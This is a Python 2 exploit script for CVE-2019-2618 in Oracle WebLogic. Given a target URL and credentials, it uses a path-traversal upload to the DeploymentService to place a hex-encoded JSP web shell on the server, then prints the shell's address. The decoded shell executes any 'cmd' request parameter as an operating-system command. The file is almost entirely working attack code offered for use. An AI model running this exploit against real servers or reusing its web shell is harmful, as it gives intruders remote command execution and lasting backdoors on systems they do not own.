﻿#coding=utf-8

import requests
import sys


print '''
========================================================================
   _______      ________    ___   ___  __  ___       ___   __ __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \     |__ \ / //_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | || | (_) |______ ) / /_ | | (_) |
 | |      \ \/ / |  __|______/ /| | | || |\__, |______/ / '_ \| |> _ < 
 | |____   \  /  | |____    / /_| |_| || |  / /      / /| (_) | | (_) |
  \_____|   \/   |______|  |____|\___/ |_| /_/      |____\___/|_|\___/ 
                                                                       
      Weblogic Upload Vuln(Need  username password)-CVE-2019-2618
                              By Jas502n     
========================================================================
'''


# url = "http://10.10.20.166:7001/"
if len(sys.argv) < 3:
    print '+-----------------------------------------------------------------------+'
    print '+ VER: Oracle WebLogic Server 10.3.6.0                                  +'
    print '+      Oracle WebLogic Server 12.1.3.0                                  +'
    print '+      Oracle WebLogic Server 12.2.1.3                                  +' 
    print '+ USE: python cve-2019-2618_exp.py <username> <password>                +'
    print '+ EXP: python cve-2019-2618.py http://1.1.1.1:7001 weblogic Oracle@123  +'
    print '+-----------------------------------------------------------------------+'
    sys.exit()
url =sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

url_dir = "/bea_wls_deployment_internal/DeploymentService"

vuln_url = url + url_dir

print "\n>>>usage: python CVE-2019-2618.py url username password\n"
print "\n>>>>The Vuln Url:\n" , vuln_url

shell = "shell.jsp"

file = '3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0d0a3c250d0a253e0d0a3c48544d4c3e3c424f44593e0d0a436f6d6d616e64732077697468204a53500d0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0d0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0d0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0d0a3c2f464f524d3e0d0a3c7072653e0d0a3c250d0a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0d0a202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0d0a2020202050726f6365737320703b0d0a20202020696620282053797374656d2e67657450726f706572747928226f732e6e616d6522292e746f4c6f7765724361736528292e696e6465784f66282277696e646f7773222920213d202d31297b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f432022202b20726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a20202020656c73657b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0d0a20202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0d0a2020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0d0a20202020537472696e672064697372203d206469732e726561644c696e6528293b0d0a202020207768696c652028206469737220213d206e756c6c2029207b0d0a202020206f75742e7072696e746c6e2864697372293b0d0a2020202064697372203d206469732e726561644c696e6528293b0d0a202020207d0d0a7d0d0a253e0d0a3c2f7072653e0d0a3c2f424f44593e3c2f48544d4c3e'.decode("hex")
proxies = {"http":"http://127.0.0.1:8080"}
payload = "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"shell.jsp\"; filename=\"%s\"\r\nContent-Type: false\r\n\r\n %s \r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--" % (shell,file)
headers = {
    'content-type': "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    # 'username': "weblogic",
    # 'password': "Oracle@123",
    "username":username,
    "password":password,
    'wl_request_type': "app_upload",
   #"wl_upload_application_name": "/../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war",
    'wl_upload_application_name': "/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war",
    'wl_upload_delta': "true",
    'archive': "true",
    'serverName': "Jas502n",
    'server_version': "10.3.6.0",
    'cache-control': "no-cache"
    }



response = requests.request("POST", vuln_url, data=payload, headers=headers)


print "\n>>>>File Upload Dir: \n " ,response.content.strip()
print "Congratulations!!!!"
print '\n>>>>Upload Shell Addresss: \n', url+ "bea_wls_internal/" + shell
